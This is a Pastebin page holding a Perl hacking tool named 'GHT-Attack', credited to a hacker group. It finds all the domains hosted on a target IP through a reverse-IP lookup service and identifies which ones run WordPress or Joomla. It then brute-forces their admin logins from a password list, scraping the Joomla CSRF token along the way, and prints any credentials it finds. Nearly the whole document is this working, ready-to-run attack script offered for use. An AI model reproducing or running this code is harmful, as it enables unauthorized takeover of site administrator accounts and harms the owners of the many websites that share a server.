Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- if($^O =~ /Win/){
- system("cls");
- }else{
- system("clear");
- }
- use HTTP::Request;
- use LWP::UserAgent;
- print q{
- ###############################################################################
- # #
- # #### ## ## ###### #### ###### ###### #### #### ## ## #
- # ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
- # ## ### ###### ## ###### ###### ## ## ###### ## #### #
- # ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
- # #### ## ## ## ## ## ## ## ## ## #### ## ## #
- # #
- ###############################################################################
- };
- print "\n";
- menu:;
- print "1. ReserVe Ip";
- print "\n2. Wordpress Brute Force";
- print "\n3. Joomla Brute Force";
- print "\n4. Info ";
- print "\n\nr00t~GHT: ";
- $menu = <>;
- if ($menu =~ /1/){
- goto Reserve
- }
- if ($menu =~ /2/){
- goto wordpress;
- }
- if ($menu =~ /3/){
- goto joomla;
- }
- if ($menu =~ /4/){
- goto Info;
- }
- else {
- print "\t\tUnknow Choise!\n";
- goto menu;
- };
- Reserve:;
- if($^O =~ /Win/){
- system("cls");
- }else{
- system("clear");
- }
- print q{
- __________
- \______ \____ ______ ______________ __ ____
- | _// __ \ / ___// __ \_ __ \ \/ // __ \
- | | \ ___/ \___ \\ ___/| | \/\ /\ ___/
- |____|_ /\___ >____ >\___ >__| \_/ \___ >
- \/ \/ \/ \/ \/
- };
- print "\n[!] Insert Target Name or IP Adress : ";
- $ip=<STDIN>;
- chomp($ip);
- print "\n[!] Grabbing Domains From $ip...\n\n";
- use LWP::UserAgent;
- use XML::Simple;
- use HTTP::Request;
- my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
- my $rp = $ua->post('http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php',
- {
- remoteAddress => $ip,
- }
- );
- my $dresult = $rp->content;
- while ($dresult =~ m/\[([^\]]*)\]/g)
- {
- $imatch = $1;
- $imatch =~ m/\"(.*?)\", \"?\"/g;
- open(a, ">>domains.txt");
- print a "$1\n";
- close(a);
- }
- if ($dresult =~ m/"message":"Daily reverse IP check limit reached for (.*)\. Please <a href='\/about'>contact<\/a> me to remove this limit\."/)
- {
- print "[-] Sorry Domains Cannot Be Listed now";
- }
- open (DOMAINS, "<domains.txt") || die "[-] Error Can't open Domains Names List ";
- @DOMAINS = <DOMAINS>;
- close PASSFILE;
- foreach my $D (@DOMAINS) {
- chomp $D;
- $wp = "http://".$D."/wp-login.php";
- my $reqwp=HTTP::Request->new(GET=>$wp);
- my $uawp=LWP::UserAgent->new();
- $uawp->timeout(30);
- my $responsewp=$uawp->request($reqwp);
- $joom = "http://".$D."/administrator/";
- my $reqjoom=HTTP::Request->new(GET=>$joom);
- my $uajoom=LWP::UserAgent->new();
- $uajoom->timeout(30);
- my $responsejoom=$uawp->request($reqjoom);
- if ($responsewp->content=~ /<body class="login">/){print "[+] $D :[Wordpress]\n";}
- else{
- if ($responsejoom->content=~ /Joomla!/){print "[+] $D :[Joomla]\n";}
- else {print "[-] $D :[Unknown] \n";}
- }
- }
- wordpress:;
- if($^O =~ /Win/){
- system("cls");
- }else{
- system("clear");
- }
- sub trim($);
- print q{
- __ __ ___. __
- / \ / \______ \_ |_________ __ ___/ |_ ____
- \ \/\/ /\____ \ ______ | __ \_ __ \ | \ __\/ __ \
- \ / | |_> > /_____/ | \_\ \ | \/ | /| | \ ___/
- \__/\ / | __/ |___ /__| |____/ |__| \___ >
- \/ |__| \/ \/
- };
- print "\n\nTarget (Without Http://) or Ip Adress : ";
- $ip = <STDIN>;
- chomp($ip);
- print "\nUser : ";
- $ulist = <STDIN>;
- chomp($ulist);
- print "\nEnter Password List : ";
- $list = <STDIN>;
- chomp($list);
- if($ip =~ /.txt/) {
- print "\n[!] Listing Domains From $ip ...\n\n";
- open (DOMAINS, "<$ip") || die "[-] ErroR Can't open Domains Names List !!";
- @DOMAINS = <DOMAINS>;
- close DOMAINS;
- }else{
- print "\n[!] Grabbing Domains From $ip ...\n\n";
- use LWP::UserAgent;
- use HTTP::Request;
- my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
- my $rp = $ua->post('http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php',
- {
- remoteAddress => $ip,
- }
- );
- my $dresult = $rp->content;
- while ($dresult =~ m/\[([^\]]*)\]/g)
- {
- $imatch = $1;
- $imatch =~ m/\"(.*?)\", \"?\"/g;
- open(a, ">>domains-$ip.txt");
- print a "$1\n";
- close(a);
- }
- if ($dresult =~ m/"message":"Daily reverse IP check limit reached for (.*)\. Please <a href='\/about'>contact<\/a> me to remove this limit\."/)
- {
- print "[-] Sorry Domains Cannot Be Listed now\n\n";
- }
- open (DOMAINS, "<domains-$ip.txt") || die "[-] Can't open the List Of Domains Names!";
- @DOMAINS = <DOMAINS>;
- close DOMAINS;
- }
- foreach my $D (@DOMAINS) {
- chomp $D;
- $wp = "http://".$D."/wp-login.php";
- my $reqwp=HTTP::Request->new(GET=>$wp);
- my $uawp=LWP::UserAgent->new();
- $uawp->timeout(20);
- my $responsewp=$uawp->request($reqwp);
- if ($responsewp->content=~ /<body class="login">/){
- print "[-]Wordpress WebSites SelecTed \n";
- print "[-]Target : $D\n";
- use LWP::UserAgent;
- use URI::URL;
- use HTTP::Request;
- use HTTP::Request::Common qw(POST);
- use HTTP::Request::Common qw(GET);
- print "[-]Brutting $D ...\n\n";
- use LWP::UserAgent;
- my $useragaint = new LWP::UserAgent;
- open (PASSFILE, "<$list") || die "[-] ErroR Can't Open Passwords List !";
- @LISTS = <PASSFILE>;
- close PASSFILE;
- foreach my $L (@LISTS) {
- chomp $L;
- $pwd = trim($L);
- my $response = $useragaint->post($wp,
- {
- "log" => "$ulist",
- "pwd" => "$pwd",
- });
- if ($content = $response->content=~ /<div id="login_error">/)
- {
- }
- else {
- print "\n\n\t[+] Password Found !! \n";
- print "\t[+] Username : $ulist\n";
- print "\t[+] Password : $pwd\n\n\n";
- }
- }
- }
- }
- sub trim($)
- {
- my $string = shift;
- $string =~ s/^\s+//;
- $string =~ s/\s+$//;
- return $string;
- }
- joomla:;
- if($^O =~ /Win/){
- system("cls");
- }else{
- system("clear");
- }
- print q{
- ____. __________ __
- | | ____ ____ _____ \______ \_______ __ ___/ |_
- | |/ _ \ / _ \ / \ ______ | | _/\_ __ \ | \ __\
- /\__| ( <_> | <_> ) Y Y \ /_____/ | | \ | | \/ | /| |
- \________|\____/ \____/|__|_| / |______ / |__| |____/ |__|
- \/ \/
- };
- print "\n\nTarget (Without Http://) or Ip Adress : ";
- $ip = <STDIN>;
- chomp($ip);
- print "Admin Name: ";
- $ulist = <STDIN>;
- chomp($ulist);
- print "Pass List: ";
- $list = <STDIN>;
- chomp($list);
- if($ip =~ /.txt/) {
- print "\n[!] Listing Domains From $ip \n\n";
- open (DOMAINS, "<$ip") || die "[-] Can't open the List Of Domains Names!";
- @DOMAINS = <DOMAINS>;
- close DOMAINS;
- }else{
- print "\n[!] Grabbing Domains From $ip ...\n\n";
- use LWP::UserAgent;
- use HTTP::Request;
- my $ua = LWP::UserAgent->new(agent => 'Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1) Gecko/20090624 Firefox/3.5');
- my $rp = $ua->post('http://www.yougetsignal.com/tools/web-sites-on-web-server/php/get-web-sites-on-web-server-json-data.php',
- {
- remoteAddress => $ip,
- }
- );
- my $dresult = $rp->content;
- while ($dresult =~ m/\[([^\]]*)\]/g)
- {
- $imatch = $1;
- $imatch =~ m/\"(.*?)\", \"?\"/g;
- open(a, ">>$ip.txt");
- print a "$1\n";
- close(a);
- }
- if ($dresult =~ m/"message":"Daily reverse IP check limit reached for (.*)\. Please <a href='\/about'>contact<\/a> me to remove this limit\."/)
- {
- print "[-] Sorry Domains Cannot Be Listed now\n\n";
- }
- open (DOMAINS, "<$ip.txt") || die "[-] Can't open the List Of Domains Names!";
- @DOMAINS = <DOMAINS>;
- close DOMAINS;
- }
- foreach my $D (@DOMAINS) {
- chomp $D;
- $joom = "http://".$D."/administrator/index.php";
- my $reqjoom=HTTP::Request->new(GET=>$joom);
- my $uajoom=LWP::UserAgent->new();
- $uajoom->timeout(0);
- my $responsejoom=$uajoom->request($reqjoom);
- if ($responsejoom->is_success && $responsejoom->content=~ /Joomla/){
- use LWP::UserAgent;
- use URI::URL;
- use HTTP::Request;
- use HTTP::Request::Common qw(POST);
- use HTTP::Request::Common qw(GET);
- use HTTP::Cookies;
- $ua = LWP::UserAgent->new(keep_alive => 1);
- $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
- $ua->timeout (0);
- $ua->cookie_jar(
- HTTP::Cookies->new(
- file => 'mycookies.txt',
- autosave => 1
- )
- );
- print "\n[-]Joomla WebSites SelecTed \n";
- print "[-]Target : $D\n";
- print "[!]Brutting $D \n\n";
- my $red = GET $joom;
- my $ret = $ua->request($red);
- $rep = $ret->content;
- $status = $ret->status_line;
- if ( $rep =~ m#(name=")(.*)" value="1"# ) {
- $token = $2 ;
- }else{
- die "[-] Can't Grabb Joomla Token !";
- }
- use LWP::UserAgent;
- my $useragaint = new LWP::UserAgent;
- open (PASSFILE, "<$list") || die "[-] Can't open the List of password file !";
- @LISTS = <PASSFILE>;
- close PASSFILE;
- foreach my $L (@LISTS) {
- chomp $L;
- $pwd = trim($L);
- my $response = $ua->post($joom,
- {
- "username" => "$ulist",
- "passwd" => "$pwd",
- "lang" => "en-GB",
- "option" => "com_login",
- "task" => "login",
- "$token" => "1",
- });
- $pwnd = $response->status_line;
- if ($pwnd =~ /303/ | $pwnd =~ /301/){
- print "\n\n\t[+] Password Found !! \n";
- print "\t[+] Username : $ulist\n";
- print "\t[+] Password : $pwd\n\n\n";
- }
- else {
- print "\t[-] $pwd Not Found \n";
- }
- }
- sub trim($)
- {
- my $string = shift;
- $string =~ s/^\s+//;
- $string =~ s/\s+$//;
- return $string;
- }
- }
- }
- Info:;
- if($^O =~ /Win/){
- system("cls");
- }else{
- system("clear");
- }
- print q{
- ###############################################################################
- # #
- # #### ## ## ###### #### ###### ###### #### #### ## ## #
- # ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
- # ## ### ###### ## ###### ###### ## ## ###### ## #### #
- # ## ## ## ## ## ## ## ## ## ## ## ## ## ## ## #
- # #### ## ## ## ## ## ## ## ## ## #### ## ## #
- # #
- ###############################################################################
- # GHT-Attack
- # Author : Mr_AnarShi-T
- # Home : GaZa-HacKeR.NeT
- # GreeT's :
- # Mr.le0n / Claw / Casper
- # Qarasinat Gaza / zero_cool
- # TKL , FOXY , BlackRose , ab0-m3az , Th-Mx , ehabneo , gl 7
- # HANINE , MaGnOm , Micha , Mr@T0rJan , Victim , llord
- # zaradusht , Riah Anasr , abath, aywanvictori
- };
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement